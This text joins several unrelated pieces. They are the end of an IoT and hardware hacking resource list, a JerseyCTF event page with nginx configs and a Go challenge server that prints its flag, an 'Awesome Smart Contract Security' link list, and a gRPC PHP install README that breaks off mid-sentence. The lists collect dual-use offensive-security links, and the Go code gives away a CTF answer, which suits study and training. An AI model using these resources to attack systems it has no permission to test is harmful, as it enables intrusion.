RogueMaster Flipper Zero Firmware : https://github.com/RogueMaster/flipperzero-firmware-wPlugins - #### Interesting research - CVE-2022-40363 : [Exploiting Flipper Zero’s NFC file loader](https://vvx7.io/posts/2022/09/your-amiibos-haunted/) #### Flipperzero101 - [Flipper Zero - Starter Guide](https://www.youtube.com/watch?v=MJd6qugqHg8&ab_channel=PenAce) #### Cool Hacks - [Flipper Zero - Starter Guide](https://www.youtube.com/watch?v=MJd6qugqHg8&ab_channel=PenAce) ******************************************************************************************************************************** ### ICS - [ICS-Security](https://github.com/V33RU/IoTSecurity101/blob/master/ICS/Industrial%20Control%20Systems.md) ******************************************************************************************************************************** ### Automotive - [Automotive-Security](https://github.com/V33RU/IoTSecurity101/blob/master/Automotive-Security.md) ******************************************************************************************************************************** ## Vulnerable IoT and Hardware Applications - IoT Goat : https://github.com/OWASP/IoTGoat - IoT : https://github.com/Vulcainreo/DVID - Safe : https://insinuator.net/2016/01/damn-vulnerable-safe/ - IoT-vulhub : https://vulntotal-team.github.io/IoT-vulhub/#%E5%AE%89%E8%A3%85 - Router : https://github.com/praetorian-code/DVRF - SCADA : https://www.slideshare.net/phdays/damn-vulnerable-chemical-process - PI : https://whitedome.com.au/re4son/sticky-fingers-dv-pi/ - SS7 Network: https://www.blackhat.com/asia-17/arsenal.html#damn-vulnerable-ss7-network - VoIP : https://www.vulnhub.com/entry/hacklab-vulnvoip,40/ - Hardware Hacking 101 : https://github.com/rdomanski/hardware_hacking - RHME-2015 : https://github.com/Riscure/RHme-2015 - RHME-2016 : https://github.com/Riscure/Rhme-2016 - RHME-2017 : https://github.com/Riscure/Rhme-2017 ******************************************************************************************************************************** ## follow the people - [Jilles](https://twitter.com/jilles_com) - [Joe Fitz](https://twitter.com/securelyfitz) - [Aseem Jakhar](https://twitter.com/aseemjakhar) - [Cybergibbons](https://twitter.com/cybergibbons) - [Jasper](https://twitter.com/jzvw) - [Dave Jones](https://twitter.com/eevblog) - [bunnie](https://twitter.com/bunniestudios) - [Ilya Shaposhnikov](https://twitter.com/drakylar) - [Mark C.](https://twitter.com/LargeCardinal) - [A-a-ron Guzman](https://twitter.com/scriptingxss) - [Yashin Mehaboobe](https://twitter.com/YashinMehaboobe) - [Arun Magesh](https://www.linkedin.com/in/marunmagesh) - [Mr-IoT](https://twitter.com/v33riot) - [QKaiser](https://twitter.com/qkaiser) - [9lyph](https://twitter.com/9lyph)
# Resources from JCTF * Ceremony Slides * Backend Web Code * Some Speaker Notes ## Ceremony Slides <!-- More like Ceremoney --> * [JerseyCTF Opening Ceremony](https://docs.google.com/presentation/d/1kF8u1f4Vr4wr1c_JM5Ct8yQSILD22Bx2WwYI49L7sDs/edit#slide=id.p) * [JerseyCTF Closing Ceremony](https://docs.google.com/presentation/d/1LInif-KFnxkv8wILIRVDxJxKUUp3cjDsr9roERaeSjY/edit#slide=id.g7a02ec5f50_0_163) ## Backend Web Code <!-- Written up and developed by AOrps with help from DigitalOcean's Wonderful Support --> * All Web Site Server services used Nginx ```txt insp3ctor -> jerseyctf.xyz post-up -> jerseyctf.info clientside -> jerseyctf.live reDirector -> jerseyctf.net ``` ### Startup Dependency Script ```bash #!/bin/bash # All the Dependecies needed sudo apt install nginx golang-go python3 -y ``` ### inspector Server * [Golang Server](https://github.com/njitacm/jerseyctf-registration-site/blob/main/serve.go) * Nginx Config ```nginx server { server_name jerseyctf.xyz www.jerseyctf.xyz; root /home/acm/inspector; index index.html; location / { proxy_pass http://localhost:9990; } } ``` ### postup Server * Golang Server Backend ```go package main import ( "fmt" "log" "net/http" ) func getFlag(w http.ResponseWriter, r *http.Request) { if r.Method != http.MethodPost { fmt.Fprintf(w, "POST UP BROTENDO\n") return } fmt.Fprintf(w, "jctf{P0st_M3th0ds_4re_c0ol_broTendo}\n") } func main() { http.HandleFunc("/", getFlag) if err := http.ListenAndServe(":9990", nil); err != nil { log.Fatal(err) } } ``` * Nginx Config ```nginx server { server_name jerseyctf.info www.jerseyctf.info; location / { proxy_pass http://localhost:9990; } ``` ### clientside Server * [Golang Server](https://github.com/njitacm/jerseyctf-registration-site/blob/main/serve.go) * Nginx Config ```nginx server { server_name jerseyctf.live www.jerseyctf.live; root /home/acm/clientside; index index.html; location / { proxy_pass http://localhost:9990; } } ``` ### redirector Server * [Python Tutorial with uWSGI](https://www.digitalocean.com/community/tutorials/how-to-serve-flask-applications-with-uswgi-and-nginx-on-ubuntu-18-04) * Nginx Config ```nginx server { listen 80; server_name jerseyctf.net www.jerseyctf.net; location / { include uwsgi_params; uwsgi_pass unix:/home/acm/redirector/redirector.sock; } } ``` --- ## Speaker Resources <!-- Report Done by DatGuy000 --> ### Gabrielle Botbol * Physical Intrusion * “Code name 23-00” * https://gabrielleb.fr/blog/2020/06/13/code-name-23-00-nom-de-code-23-00/ * Pentest Report * https://gabrielleb.fr/blog/2021/02/14/how-to-write-a-pentest-report/ * Vulnerabilities?? * XSS: https://owasp.org/www-community/attacks/xss/ * SQLI: https://owasp.org/www-community/attacks/SQL_Injection * Directory traversal: https://owasp.org/www-community/attacks/Path_Traversal * More resources and advice on my blog: * https://gabrielleb.fr/blog/2018/09/16/ressources-resources/ * https://gabrielleb.fr/blog/2020/10/18/how-to-get-started-with-pentesting/ * Hacking tools: * Tryhackme: https://tryhackme.com/ (more beginner-friendly) * Hackthebox: https://www.hackthebox.eu/ (steeper learning curve) * Contact Info * Twitter: @Gabrielle_BGB * Linkedin: /in/gabriellebotbol * [Blog](https://gabrielleb.fr/blog) * Feel free to connect: https://www.linkedin.com/in/gabriellebotbol/ ### Seth Kirschner * Speaker for big4 cyber currently at MUFG Securities Americas leading application and data security * https://www.linkedin.com/in/sethkirschner ### Ilan Ponimansky * [Github Presentation](https://github.com/iloveicedgreentea/jerseyctf-presentation) * [LinkedIn](https://www.linkedin.com/in/ilanponimansky/) ### Jon Helmus * [LinkedIn](https://www.linkedin.com/in/jon-helmus-474146103/) * [HTB Seattle Discord Link](https://discord.gg/XduZrTBp) ### William Price * [Presentation Slides](https://docs.google.com/presentation/d/1mkUdhZDPWkiOZ4BITrBfLOzFGB0ZgDno7MmwHkopylc/edit?usp=sharing) ### John Jackson * Resources: * TryHackMe [Friendly & Flexible] * HackTheBox [More Difficult] * Vulnhub [Wide Range, Hard to Vet] * CTF Events [Haystack, For-fun, Least Flexible] * https://any.run/ * https://github.com/projectdiscovery/nuclei * https://github.com/OJ/gobuster * Books * Penetration Testing: A Hands-On Introduction to Hacking, _Georgia Weidman_ * Advanced Penetration Testing: Hacking the World's Most Secure Networks _WIL ALLSOPP_ * AWS Penetration Testing: Beginner's guide to hacking AWS with tools such as Kali Linux, Metasploit, and Nmap _Jonathan Helmus_ * Corporate CyberSecurity: Identifying Risks and The Bug Bounty Program _John Jackson_ ---
# Awesome-Smart-Contract-Security ![awesome](https://awesome.re/badge.svg) ![Screenshot](img/SmartContract.png) # Table of Contents - [Blogs](#blogs) - [Papers](#papers) - [Books](#books) - [Trainings](#Trainings) - [Tools](#tools) * [Visualization](#Visualization) * [Verification](#Verification) * [Linters](#Linters) * [BugHunting](#BugHunting) * [Reverse Engineering](#Reverse_Engineering) - [Awesome-Smart-Contract-Security !awesome](#awesome-smart-contract-security-) - [Table of Contents](#table-of-contents) - [Blogs](#blogs) - [Papers](#papers) - [Books](#books) - [Security Journal list](#security-journal-list) - [Trainings](#trainings) - [Tools](#tools) - [Visualization](#visualization) - [Verification](#verification) - [Linters](#linters) - [BugHunting](#bughunting) - [Reverse Engineering](#reverse-engineering) - [Labs](#labs) - [Capture the Flag and Wargames](#capture-the-flag-and-wargames) - [Talks](#talks) - [Misc](#misc) - [Podcasts](#podcasts) - [Cheat Sheets](#cheat-sheets) - [Checklists](#checklists) - [Bug Bounty & Writeups](#bug-bounty--writeups) - [Bug Bounty Platforms & Project](#bug-bounty-platforms--project) # Blogs * [Ethernaut CTF walkthrough with Brownie framework](https://securitypills.news/articles/ethernaut/) * [Sizing Solidity Audits](https://blog.coinfabrik.com/tools/sizing-solidity-audits/) * [Reversing Ethereum Smart Contracts](https://arvanaghi.com/blog/reversing-ethereum-smart-contracts/) * [Emin Gün Sirer, professor in Cornell Tech’s IC3 lab focused on blockchain security.](http://hackingdistributed.com/) * [ Phil Daian, grad student behind KEVM, Hydra, and other Ethereum academic projects](https://pdaian.com/blog/) * [Cybersecurity R&D firm with a blockchain security practice](https://blog.trailofbits.com/) * [ Martin Swende, programmer and appsec consultant](http://swende.se/) * [Company blog about security issues and practices within blockchain ecosystem](https://blog.smartdec.net/) * [Solidity Security: Comprehensive list of known attack vectors](https://blog.sigmaprime.io/solidity-security.html) * [Use cryptography in mobile apps the right way](https://blog.oversecured.com/Use-cryptography-in-mobile-apps-the-right-way/) * [Subzero is an HSM-backed method for cold storage of Bitcoin developed by Square](https://medium.com/square-corner-blog/open-sourcing-subzero-ee9e3e071827) * [Contract upgrade anti-patterns](https://blog.trailofbits.com/2018/09/05/contract-upgrade-anti-patterns/) * [How the winner got Fomo3D prize — A Detailed Explanation](https://medium.com/coinmonks/how-the-winner-got-fomo3d-prize-a-detailed-explanation-b30a69b7813f) * [How to debug Solidity Smart Contracts with Tenderly and Truffle](https://medium.com/tenderly/how-to-debug-solidity-smart-contracts-with-tenderly-and-truffle-da995cfe098f) * [Lashing out at a Spank Channel](https://medium.com/coinmonks/lashing-out-at-a-spank-channel-2b42b23f0dc6) * [Malicious GasToken Minting](https://medium.com/level-k/public-disclosure-malicious-gastoken-minting-236b2f8ace38) * [Missing return value bug in ERC20 tokens](https://medium.com/coinmonks/missing-return-value-bug-at-least-130-tokens-affected-d67bf08521ca) * [Not A Fair Game – Fairness Analysis of Dice2win](http://blogs.360.cn/post/Fairness_Analysis_of_Dice2win_EN.html) * [Initial Formal Verification of Ethereum Casper Protocol](https://runtimeverification.com/blog/runtime-verification-completes-formal-verification-of-ethereum-casper-protocol/) * [Security considerations for Shamir's secret sharing](https://ethresear.ch/t/security-considerations-for-shamirs-secret-sharing/4294) * [SmartDec smart contract audit beginner's guide](https://blog.smartdec.net/smartdec-smart-contract-audit-beginners-guide-d04cc7f1c571) * [The Anatomy of a Block Stuffing Attack](https://osolmaz.com/2018/10/18/anatomy-block-stuffing/) * [The phenomenon of smart contract honeypots](https://medium.com/@gerhard.wagner/the-phenomena-of-smart-contract-honeypots-755c1f943f7b) * [Use our suite of Ethereum security tools](https://blog.trailofbits.com/2018/03/23/use-our-suite-of-ethereum-security-tools/) * [Vertcoin (VTC) was successfully 51% attacked](https://medium.com/coinmonks/vertcoin-vtc-is-currently-being-51-attacked-53ab633c08a4) * [Smart contract security audit: tips & tricks](https://www.cossacklabs.com/blog/smart-contract-security-audit-tips-tricks/) # Papers * [Security Strengths and Weaknesses of Blockchain Smart Contract System: A Survey](https://www.researchgate.net/profile/Malaw-Ndiaye/publication/360624196_Security_Strengths_and_Weaknesses_of_Blockchain_Smart_Contract_System_A_Survey/links/62824c3590841d5155d7dbb7/Security-Strengths-and-Weaknesses-of-Blockchain-Smart-Contract-System-A-Survey.pdf) * [Ethereum smart contract security research: survey and future research opportunities](https://link.springer.com/article/10.1007/s11704-020-9284-9) * [Smart contract security: A software lifecycle perspective](https://ieeexplore.ieee.org/iel7/6287639/8600701/08864988.pdf) * [Ethainter: a smart contract security analyzer for composite vulnerabilities](https://dl.acm.org/doi/abs/10.1145/3385412.3385990) * [NeuCheck: A more practical Ethereum smart contract security analysis tool](https://onlinelibrary.wiley.com/doi/abs/10.1002/spe.2745) * [Smart contract: Attacks and protections](https://ieeexplore.ieee.org/abstract/document/8976179/) * [Smart contract vulnerability analysis and security audite](https://ieeexplore.ieee.org/abstract/document/9143290/) * [Security analysis methods on ethereum smart contract vulnerabilities: a survey](https://arxiv.org/pdf/1908.08605) * [Smart contract privacy protection using AI in cyber-physical systems: tools, techniques and challenges](https://ieeexplore.ieee.org/iel7/6287639/8948470/08976143.pdf) * [LedgerHedger: Gas Reservation for Smart-Contract Security](https://eprint.iacr.org/2022/056.pdf) * [Combining graph neural networks with expert knowledge for smart contract vulnerability detection](https://arxiv.org/pdf/2107.11598) * [Security checklists for Ethereum smart contract development: patterns and best practices](https://arxiv.org/pdf/2008.04761.pdf) * [Exploring Security Practices of Smart Contract Developers](https://arxiv.org/pdf/2204.11193) # Books * [Fundamentals of Smart Contract Security](https://www.amazon.com/Fundamentals-Smart-Contract-Security-Richard/dp/194944936X) * [Hands-On Smart Contract Development with Solidity and Ethereum ](https://www.oreilly.com/library/view/hands-on-smart-contract/9781492045250/ch12.html) * [Mastering Ethereum](https://www.bookstack.cn/read/ethereumbook-en/a09dd11523647de0.md) ### Security Journal list * IEEE Transactions on Information Forensics and Security [[web]](http://ieeexplore.ieee.org/xpl/RecentIssue.jsp?punumber=10206) * Computer & Security[[web]](http://www.elsevier.com/wps/find/journaldescription.cws_home/405877/description#description) * IET Information Security[[web]](http://www.ietdl.org/IET-IFS) * ACM Transactions on Information and System Security[[web]](http://tissec.acm.org/) * International Journal of Information Security[[web]](http://www.springerlink.com/content/107927/) * Security and Communication Networks[[web]](http://www.wiley.com/bw/journal.asp?ref=1939-0114) * IEEE Security & Privacy[[web]]( http://www.computer.org/portal/web/security/home) * IEEE Transactions on Dependable and Secure Computing [[web]](http://www.computer.org/tdsc/) * Security and Communication Networks[[web]](http://onlinelibrary.wiley.com/journal/10.1002/(ISSN)1939-0122) * Computer Fraud & Security[[web]](http://www.elsevierscitech.com/nl/cfs/home.asp ) # Trainings * [SEC554: Blockchain and Smart Contract Security](https://www.sans.org/cyber-security-courses/blockchain-smart-contract-security/) * [SecDim](https://secdim.com) * [Ethereum Smart Contract Security](https://academy.moralis.io/courses/ethereum-smart-contract-security) * [Solidity, Blockchain, and Smart Contract Course ](https://www.youtube.com/watch?v=M576WGiDBdQ) * [Smart Contract Security 101](https://pro.eattheblocks.com/p/smart-contract-security-101) * [Certified Blockchain Security Professional (CBSP)](https://blockchaintrainingalliance.com/products/cbsp) * [Learn blockchain security](https://www.infosecinstitute.com/skills/learning-paths/blockchain-security/) # Tools ### Visualization * [ethereum-graph-debugger](https://github.com/fergarrui/ethereum-graph-debugger) - A graphical EVM debugger. Displays the entire program control flow graph. * [Slither](https://github.com/trailofbits/slither) - Slither can map method visibility and modifiers, state variables that are read and written, calls, and can print the inheritance graph of a smart contract * [Solgraph](https://github.com/raineorshine/solgraph) - Generates DOT graphs with function control flow of a solidity contract * [Surya](https://github.com/ConsenSys/surya) - Generates various visual outputs of function call graphs * [sol-function-profiler](https://github.com/EricR/sol-function-profiler) - Solidity contract function profiler ### Verification * [KEVM](https://github.com/kframework/evm-semantics) - K Semantics of the Ethereum Virtual Machine (EVM) * [Manticore](https://github.com/trailofbits/manticore) - Symbolic execution tool for EVM ### Linters * [Remix](https://remix.ethereum.org/) - Browser-based Solidity IDE with linting features * [SmarrtCheck](https://tool.smartdec.net/) - A linter for Solidity and Vyper that checks code for security issues and bad practices. * [Solhint](https://github.com/protofire/solhint) - Linter for both security and style-guide validations. It strictly adheres to the [Solidity Style Guide](https://solidity.readthedocs.io/en/latest/style-guide.html). * [Solium](https://github.com/duaraghav8/Solium) - Linter for both security and style-guide validations. Does not strictly adhere to the Solidity Style Guide. ### BugHunting * [Web3 Decoder](https://github.com/nccgroup/web3-decoder) - Web3 Decoder is a Burp Suite Extension that helps to analyze what is going on with the operations involving smart contracts of the web3 * [Echidna](https://github.com/trailofbits/echidna) - Fuzzer for Ethereum smart contracts. Uses property testing to generate malicious inputs that break smart contracts. * [Manticore](https://github.com/trailofbits/manticore) - Symbolic execution tool for Ethereum smart contracts that includes detectors for common security flaws * [Mythril OSS](https://github.com/ConsenSys/mythril/) - Open-source security analysis tool for Ethereum smart contracts built around detector modules * [Securify v2.0](https://github.com/eth-sri/securify2) - Static analysis tool from ChainSecurity * [Slither](https://github.com/trailofbits/slither) - Static analysis framework, written in Python, with detectors for many common Solidity issues * [Octopus](https://github.com/pventuzelo/octopus) - : Blockchain Smart Contracts (BTC/ETH/NEO/EOS) ### Reverse Engineering * [abi-decompiler](https://github.com/beched/abi-decompiler) - EVM reverse engineering helper utility * [ethereum-dasm](https://github.com/tintinweb/ethereum-dasm) - EVM disassembler with static and dynamic analysis abilities, including function signature lookup * [Ethersplay](https://github.com/trailofbits/ethersplay) - Visual disassembler for EVM bytecode built on Binary Ninja * [evmlab](https://github.com/ethereum/evmlab) - Utilities for interacting with the Ethereum virtual machine * [IDA-EVM](https://github.com/trailofbits/ida-evm) - IDA plugin to view EVM instructions * [Panoramix](http://eveem.org/about) * [pyevmasm](https://github.com/trailofbits/pyevmasm) - EVM assembler and disassembler with a CLI and a Python API * [Rattle](https://github.com/trailofbits/rattle) - EVM binary static analysis framework. Produces SSA representations of EVM code. * [Solidity Bytes32 Converter Online ](https://neptunemutual.com/web3-tools/string-to-bytes32-converter/) - Convert Solidity bytes32 to utf8 string or integers and vice versa. * [Online Solidity ABI Encoder](https://neptunemutual.com/web3-tools/solidity-abi-encoder-online/) - Online Solidity ABI Encoder to encode smart contract arguments, and also perform read and write operations on the blockchain. * [Ethereum Unit Converter](https://neptunemutual.com/web3-tools/ethereum-unit-converter/) - Online tool to convert the different ethereum denominations (wei, gwei, ether). # Labs * [Smart Contract Labs](https://smartcontractlabs.ee/) * [ChainLink Lab](https://chainlinklabs.com/) * [A lab that focuses on smart contract security](https://github.com/JonZeolla/lab-SmartContractSecurity) # Capture the Flag and Wargames * [Capture the Ether](https://capturetheether.com/) * [The Ethernaut](https://ethernaut.openzeppelin.com/) * [Etherhack](https://etherhack.positive.com/) * [Security Innovation Blockchain CTF](https://blockchain-ctf.securityinnovation.com/) * [Ciphershastra CTF](https://ciphershastra.com/) * [Defi Hack](https://www.defihack.xyz/) * [Gacha Lab (BSC Testnet)](https://gachalab.inspex.co/) * [Damn Vulnerable DeFi](https://www.damnvulnerabledefi.xyz/) # Talks | Title | Conference | Year | | --- | --- | --- | |[6th Workshop on Trusted Smart Contracts](https://fc22.ifca.ai/wtsc/) | WTSC 2022 | 2022| |[Smart Contract Security: a Practitioners’ Perspective](https://conf.researchr.org/details/icse-2021/icse-2021-papers/12/Smart-Contract-Security-a-Practitioners-Perspective) | ICSE 2021 |2021| | [Predicting Random Numbers in Ethereum Smart Contracts](https://schd.ws/hosted_files/appseccalifornia2018/00/AppSecCali%202018%20-%20Predicting%20Random%20Numbers%20in%20Ethereum%20Smart%20Contracts.pdf) | OWASP AppSec | 2018 | | [Blockchain Autopsies - Analyzing Smart Contract Deaths](https://github.com/trailofbits/publications/tree/master/presentations/Blockchain%20Autopsies%20-%20Analyzing%20Smart%20Contract%20Deaths) | Blackhat USA | 2018 | | [Rattle - an EVM binary analysis framework](https://www.trailofbits.com/presentations/rattle/) | reCON | 2018 | | [Blackhat Ethereum](https://github.com/trailofbits/publications/blob/master/presentations/Blackhat%20Ethereum) | CanSecWest | 2018 | | [Smashing Ethereum Smart Contracts for Fun and Profit](https://github.com/b-mueller/smashing-smart-contracts) | HITB Amsterdam | 2018 | | [Automatic Bug Finding for the Blockchain](https://github.com/trailofbits/publications/blob/master/presentations/Automatic%20bugfinding%20for%20the%20blockchain) | EkoParty | 2017 | # Misc * [Security Pitfalls & Best Practices 201](https://secureum.substack.com/p/security-pitfalls-and-best-practices-201) * [Hacking Smart Contracts: Beginners Guide](https://learn.block6.tech/hacking-smart-contracts-beginners-guide-9c84e9de7194) * [Security Pitfalls & Best Practices 101](https://secureum.substack.com/p/security-pitfalls-and-best-practices-101?s=r) * [A guide to smart contract security best practices](https://github.com/ConsenSys/smart-contract-best-practices) * [Decentralized Application Security Project (or DASP) Top 10](https://www.dasp.co/) * [Solidity Security Considerations](https://docs.soliditylang.org/en/latest/security-considerations.html) * [A Collection of Vulnerabilities in ERC20 Smart Contracts](https://github.com/sec-bit/awesome-buggy-erc20-tokens) * [Examples of Solidity security issues](https://github.com/crytic/not-so-smart-contracts) * [A guide to smart contract security best practices](https://github.com/ConsenSys/smart-contract-best-practices) * [A guide to EOS smart contract security best practices](https://github.com/slowmist/eos-smart-contract-security-best-practices) # Podcasts * [CoinSec Podcast](https://coinsecpodcast.com/) * [The Smartest Contract](https://www.listennotes.com/podcasts/the-smartest-contract-jeffrey-tong-DmE7O9AYifI/) * [Zero Knowledge](http://www.zeroknowledge.fm/) # Cheat Sheets * [Solidity Cheat Sheet](https://intellipaat.com/blog/tutorial/blockchain-tutorial/solidity-cheat-sheet/) * [Solidity Cheatsheet and Best practices](https://github.com/manojpramesh/solidity-cheatsheet) * [Ethereum Cheat Sheet](https://intellipaat.com/blog/tutorial/blockchain-tutorial/ethereum-cheat-sheet/) * [The Ultimate Blockchain Cheat Sheet](https://101blockchains.com/blockchain-cheat-sheet/) # Checklists * [Solidity Auditing Checklistt](https://github.com/cryptofinlabs/audit-checklist) * [SMART CONTRACT SECURITY CHECKLIST](https://ethereum.org/en/developers/tutorials/secure-development-workflow/) * [Smart Contract Security Audit: Intro & Top 5 Best Practices](https://www.getastra.com/blog/security-audit/smart-contract-security/) * [Smart Contract Security Verification Standard](https://securing.github.io/SCSVS/) * [Security checklists for Ethereum smart contract development](https://arxiv.org/pdf/2008.04761) # Bug Bounty & Writeups * [Hands on the Ethernaut CTF](https://blog.trailofbits.com/2017/11/06/hands-on-the-ethernaut-ctf/) - Writeups for various Ethernaut CTF challenge contracts. * [Ethernaut - Naught Coin (ERC20) Exploitation](https://medium.com/coinmonks/ethernaut-naught-coin-erc20-exploitation-218c86bb953b) - Writeup for a vulnerable ERC20 from the Ethernaut CTF. * [EtherHack CTF Writeup](https://blog.positive.com/phdays-8-etherhack-contest-writeup-794523f01248) - Writeup for EtherHack CTF challenges. * [PolySwarm Smart Contract Hacking Challenge Writeup](https://raz0r.name/writeups/polyswarm-smart-contract-hacking-challenge-writeup/) - Demonstrates advanced use of Manticore * [Write up of Metaplex Vuln 2022](https://github.com/Bonfida/metaplex-vulnerability-012022) * [Smart Contract security audit reports](https://github.com/TechRate/Smart-Contract-Audits) # Bug Bounty Platforms & Project * [Immunefi](https://immunefi.com/explore/) * [hackenproof](https://hackenproof.com/) * [ETHEREUM Bounty Program](https://bounty.ethereum.org/#bounty-scope) * [Etherscan Bugbounty Program](https://etherscan.io/bugbounty) * [Parity Bug Bounty Program](https://www.parity.io/bug-bounty/) * [Gitcoint project](https://gitcoin.co/explorer?network=mainnet&idx_status=open&applicants=ALL&order_by=-web3_created) * [Code Arena Bugbounty project](https://code4rena.com/) * [Smartlink Dapps](https://www.smartlink.so/bug-bounty/) * [Bug Rap](https://bugrap.io/) * [Bug Bounty Programs 2023](https://hackenproof.com/programs?page=4)
# Overview This directory contains source code for PHP implementation of gRPC layered on shared C library. The same installation guides with more examples and tutorials can be seen at [grpc.io](https://grpc.io/docs/quickstart/php.html). gRPC PHP installation instructions for Google Cloud Platform is in [cloud.google.com](https://cloud.google.com/php/grpc). ## Environment ### Prerequisite: * `php` 5.5 or above, 7.0 or above * `pecl` * `composer` * `phpunit` (optional) **Install PHP and PECL on Ubuntu/Debian:** For PHP5: ```sh $ sudo apt-get install php5 php5-dev php-pear phpunit ``` For PHP7: ```sh $ sudo apt-get install php7.0 php7.0-dev php-pear phpunit ``` or ```sh $ sudo apt-get install php php-dev php-pear phpunit ``` **Install PHP and PECL on CentOS/RHEL 7:** ```sh $ sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm $ sudo rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm $ sudo yum install php56w php56w-devel php-pear phpunit gcc zlib-devel ``` **Install PHP and PECL on Mac:** ```sh $ curl -O http://pear.php.net/go-pear.phar $ sudo php -d detect_unicode=0 go-pear.phar ``` **Install Composer (Linux or Mac):** ```sh $ curl -sS https://getcomposer.org/installer | php $ sudo mv composer.phar /usr/local/bin/composer ``` **Install PHPUnit (Linux or Mac):** ```sh $ wget https://phar.phpunit.de/phpunit-old.phar $ chmod +x phpunit-old.phar $ sudo mv phpunit-old.phar /usr/bin/phpunit ``` ## Install the gRPC PHP extension There are two ways to install gRPC PHP extension. * `pecl` * `build from source` ### Using PECL ```sh sudo pecl install grpc ``` or specific version ```sh sudo pecl install grpc-1.12.0 ``` Note: for users on CentOS/RHEL 6, unfortunately this step won’t work. Please follow the instructions below to compile the PECL extension from source. #### Install on Windows You can download the pre-compiled gRPC extension from the PECL [website](https://pecl.php.net/package/grpc) ### Build from Source with gRPC C core library Clone this repository ```sh $ git clone -b $(curl -L https://grpc.io/release) https://github.com/grpc/grpc ``` #### Build and install the gRPC C core library ```sh $ cd grpc $ git submodule update --init $ make $ sudo make install ``` #### Build and install gRPC PHP extension Compile the gRPC PHP extension ```sh $ cd grpc/src/php/ext/grpc $ phpize $ ./configure $ make $ sudo make install ``` This will compile and install the gRPC PHP extension into the standard PHP extension directory. You should be able to run the [unit tests](#unit-tests), with the PHP extension installed. ### Update php.ini After installing the gRPC extension, make sure you add this line to your `php.ini` file, (e.g. `/etc/php5/cli/php.ini`, `/etc/php5/apache2/php.ini`, or `/usr/local/etc/php/5.6/php.ini`), depending on where your PHP installation is. ```sh extension=grpc.so ``` **Add the gRPC PHP library as a Composer dependency** You need to add this to your project's `composer.json` file. ``` "require": { "grpc/grpc": "v1.12.0" } ``` To run tests with generated stub code from `.proto` files, you will also need the `composer` and `protoc` binaries. You can find out how to get these below. ## Install other prerequisites for both Mac OS X and Linux * `protoc: protobuf compiler` * `protobuf.so: protobuf runtime library` * `grpc_php_plugin: Generates PHP gRPC service interface out of Protobuf IDL` ### Install Protobuf compiler If you don't have it already, you need to install the protobuf compiler `protoc`, version 3.5.0+ (the newer the better) for the current gRPC version. If you installed already, make the protobuf version is compatible to the grpc version you installed. If you build grpc.so from the souce, you can check the version of grpc inside package.xml file. The compatibility between the grpc and protobuf version is listed as table below: grpc | protobuf --- | --- v1.0.0 | 3.0.0(GA) v1.0.1 | 3.0.2 v1.1.0 | 3.1.0 v1.2.0 | 3.2.0 v1.2.0 | 3.2.0 v1.3.4 | 3.3.0 v1.3.5 | 3.2.0 v1.4.0 | 3.3.0 v1.6.0 | 3.4.0 v1.8.0 | 3.5.0 v1.12.0 | 3.5.2 v1.13.1 | 3.5.2 v1.14.2 | 3.5.2 v1.15.1 | 3.6.1 v1.16.1 | 3.6.1 v1.17.2 | 3.6.1 v1.18.0 | 3.6.1 v1.19.1 | 3.6.1 v1.20.1 | 3.7.0 v1.21.3 | 3.7.0 v1.22.0 | 3.8.0 If `protoc` hasn't been installed, you can download the `protoc` binaries from [the protocol buffers Github repository](https://github.com/google/protobuf/releases). Then unzip this file and update the environment variable `PATH` to include the path to the protoc binary file. If you really must compile `protoc` from source, you can run the following commands, but this is risky because there is no easy way to uninstall / upgrade to a newer release. ```sh $ cd grpc/third_party/protobuf $ ./autogen.sh && ./configure && make $ sudo make install ``` ### Protobuf Runtime library There are two protobuf runtime libraries to choose from. They are identical in terms of APIs offered. The C implementation provides better performance, while the native implementation is easier to install. Make sure the installed protobuf version works with grpc version. #### 1. C implementation (for better performance) ``` sh $ sudo pecl install protobuf ``` or specific version ``` sh $ sudo pecl install protobuf-3.5.1.1 ``` Add this to your `php.ini` file: ```sh extension=protobuf.so ``` #### 2. PHP implementation (for easier installation) Add this to your `composer.json` file: ``` "require": { "google/protobuf": "^v3.5.0" } ``` ### PHP Protoc Plugin You need the gRPC PHP protoc plugin to generate the client stub classes. It can generate server and client code from .proto service definitions. It should already been compiled when you run `make` from the root directory of this repo. The plugin can be found in the `bins/opt` directory. We are planning to provide a better way to download and install the plugin in the future. You can also just build the gRPC PHP protoc plugin by running: ```sh $ git clone -b $(curl -L https://grpc.io/release) https://github.com/grpc/grpc $ cd grpc $ git submodule update --init $ make grpc_php_plugin ``` Plugin may use the new feature of the new protobuf version, thus please also make sure that the protobuf version installed is compatible with the grpc version you build this plugin. ## Unit Tests You will need the source code to run tests ```sh $ git clone -b $(curl -L https://grpc.io/release) https://github.com/grpc/grpc $ cd grpc $ git submodule update --init ``` Run unit tests ```sh $ cd grpc/src/php $ ./bin/run_tests.sh ``` ## Generated Code Tests This section specifies the prerequisites for running the generated code tests, as well as how to run the tests themselves. ### Composer Install the runtime dependencies via `composer install`. ```sh $ cd grpc/src/php $ composer install ``` ### Client Stub Generate client stub classes from `.proto` files ```sh $ cd grpc/src/php $ ./bin/generate_proto_php.sh ``` ### Run test server Run a local server serving the math services. Please see [Node][] for how to run an example server. ```sh $ cd grpc/src/php/tests/generated_code $ npm install $ node math_server.js ``` ### Run test client Run the generated code tests ```sh $ cd grpc/src/php $ ./bin/run_gen_code_test.sh ``` ## Use the gRPC PHP extension with Apache Install `apache2`, in addition to `php5` above ```sh $ sudo apt-get install apache2 ``` Add this line to your `php.ini` file, e.g. `/etc/php5/apache2/php.ini` or `/etc/php/7.0/apache2/php.ini` ```sh extension=grpc.so ``` Restart apache ```sh $ sudo service apache2 restart ``` Make sure the Node math server is still running, as above. ```sh $ cd grpc $ npm install $ node src/node/test/math/math_server.js ``` Make sure you have run `composer install` to generate the `vendor/autoload.php` file ```sh $ cd grpc/src/php $ composer install ``` Make sure you have generated the client stubs ```sh $ ./bin/generate_proto_php.sh ``` Copy the `math_client.php` file into your Apache document root, e.g. ```sh $ cp tests/generated_code/math_client.php /var/www/html ``` You may have to fix the first line to point the includes to your installation: ```php include 'vendor/autoload.php'; ``` Connect to `localhost/math_client.php` in your browser, or run this from command line: ```sh $ curl localhost/math_client.php ``` ## Use the gRPC PHP extension with Nginx/PHP-FPM Install `nginx` and `php5-fpm`, in addition to `php5` above ```sh $ sudo apt-get install nginx php5-fpm OR $ sudo apt-get install nginx php7.0-fpm ``` Add this line to your `php.ini` file, e.g. 